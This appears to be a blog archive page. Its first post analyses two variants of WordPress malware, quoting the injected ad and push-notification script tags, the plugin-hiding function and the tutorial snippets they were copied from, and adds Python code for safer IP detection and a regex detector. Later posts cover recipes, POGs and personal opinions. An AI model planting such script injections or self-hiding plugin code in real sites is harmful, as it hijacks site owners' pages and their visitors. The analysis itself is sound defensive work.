The Genealogy of Malware

While working on Jetpack Security, one thing I have a greater opportunity than most to do is inspect naughty bits of code that get injected into a user’s site.

One that I stumbled upon this past week reminded me of another from a bit ago — I can’t say precisely what reminded me of it, but my brain connected the two. So I looked back to find the prior infection and this is what turned up:

https://www.diffchecker.com/MYId3pFX

Clearly — a number of similarities between the two files. Of the four hundred plus lines in question, only fifty or so contain any changes, and most of those are namespace changes (mont to ccode) or perhaps some subtle refinements in how it detects the remote visitor’s IP address.

One of the most interesting aspects — to me anyways — is tracing the source of various snippets used in the code.

Good artists copy. Great artists steal.

Steve Jobs, misattributing a quotation to Pablo Picasso

So firstly, when skimming the code, around line 20, I found the following:

add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_link');
function salcode_add_plugin_page_settings_link( $links ) {
	$links[] = '<a href="' .
		admin_url( 'options-general.php?page=monit' ) .
		'">' . __('Settings') . '</a>';
	return $links;
}

Huh — it references salcode — I know that namespace, it’s commonly used by Sal Ferrarello! Figuring it may have been lifted off an article he’d written, I reached out to check. Sure enough, he had a 2014 article called “WordPress Plugin Add Settings Link” that he pointed me towards — and sure enough, the code was a straight copy/paste job in the Monitization variant. In the Custom Code variant of the malware, it was tweaked to be namespaced a bit further (changing the trailing link to ccode), but the similarities are still there.

We also can glean a bit from the tags that the code tries to inject. The original attempts:

<script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3260072" async data-cfasync="false"></script>
<script src="https://pushsar.com/pfe/current/tag.min.js?z=3260077" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3324386" data-cfasync="false" async="async"></script>

Where the latter Custom Code implementation attempts:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3388587,document.body||document.documentElement)</script>
<script src=\"https://propu.sh/pfe/current/tag.min.js?z=3388595\" data-cfasync=\"false\" async></script>
<script type=\"text/javascript\" src=\"//inpagepush.com/400/3388600\" data-cfasync=\"false\" async=\"async\"></script>

Besides the change in which quotes need escaping (the wrapping string switched from single to double quotes), we can see a couple of notable bits:

  • The first tag seems to have been swapped out in its entirety.
  • The second tag seems to have swapped from pushsar.com to propu.sh — with the general url structure remaining the same. This can indicate the service just changed domains, and kept everything else business as usual.
  • The last tag remained as before — inpagepush.com — with only the identifier on the end changed.

A bit later on, we can find several instances where the mont namespace (possibly typo’d from monit) was not changed to ccode:

register_setting( 'ccode-settings', 'default_mont_options' );
if(get_option('default_mont_options') !=='on')

At the end of the file, we’re confronted with this bit:

function hide_plugin_trickspanda() {
  global $wp_list_table;
  $hidearr = array('monit.php');
  $myplugins = $wp_list_table->items;
  foreach ($myplugins as $key => $val) {
    if (in_array($key,$hidearr)) {
      unset($wp_list_table->items[$key]);
    }
  }
}

Here again, we’ve got a strong hint from the namespace, trickspanda. So in this case, it came from an article that Hardeep Asrani wrote on Tricks Panda — again, back in 2014. The Monitization variant didn’t seem to change the namespace, leaving it as trickspanda, but the later Custom Code variant swapped it out to ccode.

Finally, at the conclusion of the Custom Code variant (not present in the original) we can see the following:

function getVisIpAddr_ccode() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    }
    else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else {
        return $_SERVER['REMOTE_ADDR'];
    }
}

As it is, this seems to have been lifted from a Geeks For Geeks article dated May 2019. The code uses it up above to handle instances where traffic comes through a load balancer or proxy or the like, with original IP addresses in the header. Interestingly enough, for anyone else who has a need for similar functionality, WordPress Core ships with a similar function already, get_unsafe_client_ip().
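To show why that lifted routine is only fit for informational use (as the “unsafe” in the WordPress function’s name hints), here is an added Python port of it next to a version that honors forwarding headers only when the connection actually arrives from a known proxy. This is example code written for this post, not the malware’s or WordPress Core’s; the request environments and the 10.0.0.0/8 proxy range are constructed assumptions.

```python
import ipaddress

# Constructed stand-ins for PHP's $_SERVER on four requests (sample data, not real traffic).
DIRECT = {"REMOTE_ADDR": "203.0.113.10"}
VIA_PROXIES = {"REMOTE_ADDR": "10.0.0.5",            # internal LB, which got it from edge 10.0.0.6
               "HTTP_X_FORWARDED_FOR": "203.0.113.10, 10.0.0.6"}
SPOOFED = {"REMOTE_ADDR": "10.0.0.5",                # same path, but the client sent its own header
           "HTTP_X_FORWARDED_FOR": "127.0.0.1, 203.0.113.10"}
SPOOFED_DIRECT = {"REMOTE_ADDR": "203.0.113.10", "HTTP_CLIENT_IP": "127.0.0.1"}

# Assumption for this example: the site's load balancers all live in 10.0.0.0/8.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

def lifted_vis_ip(server):
    """Straight port of getVisIpAddr_ccode(): any client-supplied header wins over the TCP peer."""
    if server.get("HTTP_CLIENT_IP"):
        return server["HTTP_CLIENT_IP"]
    if server.get("HTTP_X_FORWARDED_FOR"):
        return server["HTTP_X_FORWARDED_FOR"]
    return server["REMOTE_ADDR"]

def _trusted(addr, trusted):
    return any(addr in net for net in trusted)

def client_ip(server, trusted=TRUSTED_PROXIES):
    """Use X-Forwarded-For only when the peer is a known proxy, and take the
    right-most hop that is not itself a trusted proxy (proxies append, so the
    left end of the list is whatever the client chose to send)."""
    peer = ipaddress.ip_address(server["REMOTE_ADDR"])
    if not _trusted(peer, trusted):
        return str(peer)                    # direct connection: the headers mean nothing
    hops = [h.strip() for h in server.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break                           # malformed entry: stop trusting the chain
        if not _trusted(addr, trusted):
            return str(addr)
    return str(peer)                        # nothing usable: fall back to the peer

if __name__ == "__main__":
    for name, env in [("direct", DIRECT), ("via_proxies", VIA_PROXIES),
                      ("spoofed", SPOOFED), ("spoofed_direct", SPOOFED_DIRECT)]:
        print(f"{name:15} lifted={lifted_vis_ip(env)!r:28} hardened={client_ip(env)!r}")
```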

So what have we found? Code gets reused, a lot. Old tutorials from 2014 can still offer information going strong years afterwards. Be wise about which bits of bad code you use to fingerprint it and identify future infections: it’s far better to key on the unremarkable but unique bits than on the bits they may change to conceal it in future iterations.
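To put that closing advice into practice, here is an added Python scanner (example code written for this post, not part of the original or of Jetpack) that keys on the leftovers called out above, the un-renamed default_mont_options option and the plugin-hiding trick, alongside the volatile ad-network rules, and runs both sets over constructed, abbreviated stand-ins for the two variants plus a benign plugin that merely copied Sal’s tutorial. The samples and rule names are assumptions made for the example.

```python
import re

# Constructed, abbreviated stand-ins for the two infections discussed above.
# They are illustrative samples written for this example, not the real files.
MONIT_VARIANT = r"""
add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_link');
register_setting( 'monit-settings', 'default_mont_options' );
echo '<script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3260072" async data-cfasync="false"></script>';
echo '<script src="https://pushsar.com/pfe/current/tag.min.js?z=3260077" data-cfasync="false" async></script>';
function hide_plugin_trickspanda() { global $wp_list_table; unset($wp_list_table->items['monit.php']); }
"""
CCODE_VARIANT = r"""
add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_link_ccode');
register_setting( 'ccode-settings', 'default_mont_options' );
echo "<script src=\"https://propu.sh/pfe/current/tag.min.js?z=3388595\" data-cfasync=\"false\" async></script>";
function hide_plugin_ccode() { global $wp_list_table; unset($wp_list_table->items['ccode.php']); }
"""
# A benign plugin that only copied Sal Ferrarello's settings-link tutorial.
LEGIT_PLUGIN = r"""
add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_link');
register_setting( 'myplugin-settings', 'myplugin_options' );
"""

# Volatile rules key on things the author can swap freely (ad domains, zone ids).
VOLATILE_RULES = {
    "ofgogoatan_zone": re.compile(r"ofgogoatan\.com/apu\.php\?zoneid=\d+"),
    "pushsar_tag": re.compile(r"pushsar\.com/pfe/current/tag\.min\.js"),
}
# Stable rules key on the unremarkable leftovers: the un-renamed option name and
# the self-hiding trick. The tutorial settings link survives renames too, but it
# also appears in legitimate plugins, so it must not be enough on its own.
STABLE_RULES = {
    "leftover_mont_option": re.compile(r"default_mont_options"),
    "hides_itself_from_plugin_list": re.compile(r"unset\(\s*\$wp_list_table->items\["),
    "tutorial_settings_link": re.compile(r"salcode_add_plugin_page_settings_link"),
}

def scan(src):
    """Return the set of rule names that match the given PHP source."""
    rules = {**VOLATILE_RULES, **STABLE_RULES}
    return {name for name, rx in rules.items() if rx.search(src)}

def is_suspicious(src):
    """Flag a file only when at least two malware-specific stable traits co-occur."""
    hits = scan(src) & set(STABLE_RULES)
    hits.discard("tutorial_settings_link")  # too common in benign code to count
    return len(hits) >= 2

if __name__ == "__main__":
    for label, src in [("monit", MONIT_VARIANT), ("ccode", CCODE_VARIANT), ("legit", LEGIT_PLUGIN)]:
        print(label, sorted(scan(src)), "suspicious" if is_suspicious(src) else "clean")
```

Only the volatile rules distinguish the two variants; the stable ones match both and leave the benign plugin alone.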

Star Wars Galaxy’s Edge Set Dressing

Here’s a bunch of photos I took last week at Star Wars Galaxy’s Edge – Black Spire Outpost in Disneyland. I thought they may be useful for anyone trying to build a similar thematic structure, either for dressing up a home theater room, or just to add some spice to a family room.

So that I don’t lose it: Stifado Recipe

Ingredients: 

  • 2-3 lbs beef, cubed
  • 2-3 lbs pearled onions
  • 1 large yellow onion, chopped
  • 1 28 oz can tomatoes
  • 1 cup dry red wine
  • ¼ cup red wine vinegar
  • ⅓ cup olive oil
  • 3 cloves garlic, bruised
  • 1 tsp sugar
  • Spice bag:
    • 2 bay leaves
    • 1 tablespoon allspice berries
    • 2 3-inch cinnamon sticks
  1. In a stew pot / dutch oven, over medium-low heat, add the chopped onion, half the olive oil, and ¼ cup water.  Cook until the water has evaporated and the onion is soft and translucent, about 10 minutes.
  2. To the onions, add the garlic and tomatoes.  Cook, stirring, until the sauce is thick, about 20 minutes.
  3. Rinse the beef, drain, pat dry.  Season lightly with salt and pepper.  Heat the remaining olive oil in a skillet until hot.  Brown the beef over high heat, add to the tomato sauce.
  4. Add the red wine to the skillet to deglaze, and bring to a boil while scraping up any fond from the bottom of the pan.  Add the pearled onions and sugar, and cook over medium-high heat, stirring, until the wine is reduced to a glaze and the onions are lightly browned, about 5 minutes.
  5. Add 3 tablespoons of the red wine vinegar to the onions, and bring to a boil.
  6. Add the spice bag and the onions and wine sauce to the beef and tomato sauce mixture.
  7. Cover and cook over low heat for 2-2½ hours.


The Dimensions of POGs

Because of reasons, I’ve had cause to dig out my old POG collection and take detailed measurements of them.  Here’s what I’ve come up with:

A POG Milkcap measures:

  • 41.37 mm or 1.6285 inches in diameter.
  • 1.25 mm or 0.0490 inches in thickness.
  • Forty POGs weigh 1.65 oz or ~0.041 oz per POG.
  • Forty POGs measure 2.0310 inches in thickness.

An off-brand Slammer is:

  • 42.80 mm or 1.6850 inches in diameter.
  • 5.91 mm or 0.235 inches in thickness.
  • 0.30 oz.

So, a Slammer is approximately 4-5 POGs in thickness, about 1.5mm larger in diameter, and weighs approximately 7-8 times as much as an individual POG.


When Mike Pence Comes to Your Alma Mater

I’ll be writing a similar letter to my alma mater’s leadership shortly.

Very disappointed right now.

Grace Leuenberger

Below is a letter I sent to my alma mater. I am sharing it here not because I want to make people mad, but because I spent four years hardly ever discussing my political views as a student. I believe the choice to bring Mike Pence to our college is short-sighted, and that many wise, remarkable individuals could have better aligned with the viewpoints and values of the college, its students, its staff, and its alumni. I care about my college too much not to be disappointed and worried about the implications this invitation has. I invite respectful dialogue and alternative viewpoints in the comments below.


Dear Grove City College leadership,

I send this letter today with a desire to respectfully disagree with the recent decision to invite Vice President Michael Pence to speak at this year’s Commencement exercises. Though I recognize that my letter will not alter the decision or…


Chicken Tender Wrap

  • Servings: 1
  • Difficulty: Easy

Food of the Gods

One of the best things about my college experience at Grove City was the one unique, delectable item on the menu that — to date — I’ve never seen quite duplicated elsewhere.  So for any other Grovers out there that miss the taste of the Chicken Tender Wrap, here’s what I’ve come up with as a pretty darn close approximation.

Credit: Angela Starosta and Matt Schiavone for help piecing back together the recipe.

Ingredients

  • 1 large burrito-size tortilla
  • Diced plum tomatoes
  • Chopped iceberg lettuce
  • 2 Chicken Tenders
  • Ranch dressing
  • Hot sauce (optional)
  • White rice
  • Shredded mild cheddar cheese

Directions

  1. Put two frozen chicken tenders in a microwave safe bowl, and microwave for 1m30.
  2. Put the tortilla wrap you’re using on a plate.  Spread some diced tomatoes and chopped lettuce as a base.
  3. Take the (now hot) chicken out of the microwave, and put it in some hot oil in a skillet over medium heat for about 30-45 seconds per side.
  4. Take the chicken tenders out of the oil, put them on a cutting board, and chop them into maybe ½” chunks.
  5. In the same microwave safe bowl, put approximately equal quantities of white rice, and then shredded cheddar cheese in, and microwave for 1m30.
  6. Spread the chicken on top of the lettuce on the wrap.  Add your desired quantities of ranch dressing and hot sauce.
  7. Take the melted cheese and rice out of the microwave and combine it with a spoon until it’s mixed.  Add this on top of the chicken.
  8. Wrap, folding the edges, and slice it on a bias.  Enjoy!

Disclaimer: You’ll want a bigger tortilla than I’m using in the pictures.  I wound up having way too much stuff in it, and had to split it into two wraps after trying to wrap it.

Kiri Kiri Basara, a lesson in domains

Howdy!  If you’re here, one of two things happened.

Either you follow me on social media or my blog and found this new post, or you’re an anime fan watching Occultic;Nine, and saw the domain kirikiribasara.com in episode one and tried typing it into a web browser.  That domain — for now — redirects to here.

Here begins the lesson:

If you’re ever using a domain name in a movie, or a tv show, or in a presentation — any form, really — do yourself a favor and make sure you buy the domain before you go live.

It’ll cost you like $12, tops.  If your show flops, no big deal.  You don’t need to renew it for a subsequent year.  But if it takes off — or even if someone pulls up the domain just right after airtime, it’s a great tool to engage your users.

Or, you could not buy it, and some rando on the internet (hi there) can scoop the domain up for $12 on Google Domains.  Or cheaper if I wanted to go elsewhere.

Also, if you would like to start your own affiliate blog (like the domain was used for in the anime), I’d suggest building at WordPress.com!

As an aside, I’m not really looking to sell the domain, I just think it’s funny, but if anyone does desperately want the domain to run some sort of fan-forum or if the show’s producers are interested, feel free to drop me a line — the contact form on this site should work, and I’m fairly easy to reach on social media. 🙂

On the FDA and E Cigarettes

DISCLAIMER: While I may enjoy a rare cigar or pipe of tobacco perhaps once or twice per year, I don’t regularly consume tobacco products or nicotine. This post is more my musings on the bureaucracy and workings of the federal government.

Yesterday, the Food and Drug Administration (FDA) expanded its regulation authority to include “Vaporizers, vape pens, hookah pens, electronic cigarettes (e-cigs), and e-pipes are some of the many types of Electronic Nicotine Delivery Systems (ENDS)”.

I have concerns.

According to their press release,

Examples of components and parts of ENDS include, but are not limited to:

  • E-liquids
  • A glass or plastic vial container of e-liquid
  • Cartridges
  • Atomizers
  • Certain batteries
  • Cartomizers and clearomizers
  • Digital display or lights to adjust settings
  • Tank systems
  • Drip tips
  • Flavorings for ENDS
  • Programmable software

So, in short, it’s regulating all of the paraphernalia associated with vaping, and not merely the nicotine itself.

This is concerning to me.

Back in my college days, I used to smoke a (tobacco) pipe and cigars on a weekly basis with other students.  It was a communal event, and I learned to blow smoke rings.  As I’ve grown in the decade since then, I’ve lost the inclination to smoke, and really have no desire for nicotine.  I’ll occasionally smoke a pipe socially with friends once or twice a year, but I do enjoy blowing smoke rings.

As such, I own an electronic cigarette, and I purchased a quart of food-grade USP Propylene Glycol — the base liquid that most suppliers use when making liquid for vaping — and I’ll occasionally use it to blow smoke rings in my office.  No nicotine, no flavorings.

By my understanding, the FDA’s regulation of E-liquids has no limitation to “We only regulate E-liquids that contain nicotine” — in fact, they even state explicitly that:

If the tobacco product manufacturer submits a self-certification statement to FDA that the newly-regulated tobacco product does not contain nicotine (and that the manufacturer has data to support this assertion), then an alternate statement must be used on product packages and advertisements:

“This product is made from tobacco.”

Keep in mind that they are also broadly defining “Tobacco Product” to include all ENDS including all E-liquids and cartridges, atomizers, and even certain batteries. They must be labeled (falsely) that it is made from tobacco?

This feels like a significant overreach.

It strikes me that a similar regulatory effect could be accomplished simply by regulating exclusively substances that contain nicotine. What is gained by having the Food and Drug Administration regulate the batteries that power vaporizers? Regulate the nicotine. If someone’s selling electronic cigarettes that come preloaded with nicotine? Sure, regulate that.  But leave the rest alone.

Two Weddings, One Family

I attended two weddings in the family this past weekend.  Two cousins, both on my mom’s side, tied the knot.

Saturday was a beautiful outdoor wedding at a farm in the countryside.  It was about a four hour drive away, which made it into a bit of an interesting day trip, but mostly uneventful.

Sunday was a much easier affair to make it to.  A scant fourteen minute drive from our house, a “come as you are” ceremony.  Much easier to pull off with a seven month and three year old in tow.

And yet some members of the family chose not to attend.

Some members of the family who just drove eight hours round trip to attend another cousin’s wedding didn’t attend.

Why?

It was a gay (or, more specifically, lesbian) wedding.


And it ranks up there in one of the most charming weddings I’ve ever attended.  The schedule on the program was titled “The Gay Agenda,” and they made jokes about “If this isn’t your first gay wedding, please keep the Bernie chatter to a minimum,” “Now that you’re all attending a gay wedding, congratulations, you’re all gay too,” and even “By the authority vested in me by Obergefell v. Hodges.”

My mind is just utterly blown at trying to comprehend the mindset that feels it’s more important to not attend a non-religious marriage ceremony.  If you’re Catholic, would you also refuse to attend the wedding of a cousin who was previously divorced and is now getting remarried?  Or do you only attend religious wedding ceremonies presided over by your own church?

I mean — what’s the thinking behind this? “If only I don’t attend their wedding, they’ll recognize the error of their ways, and abandon their sinful plan to marry the person that they want to spend the rest of their lives with?”

(btw, I’m pretty sure the bible doesn’t say anything about gay marriage, all the verses deal with the consummation, and I’m pretty dang sure you’re not invited to that part)

In the end, if I’m going to screw up in this life, I want it to be for loving and accepting people, not making them feel unwelcome or judged.  That’s my Pascal’s Wager. And that’s what I believe the message of the gospel is. The message of the Christ who dined with prostitutes.

Don’t approve of gay marriage?  That’s cool, don’t get gay married. 👍

But to not attend feels spiteful and unkind and wrong.

And I’m left feeling disappointed.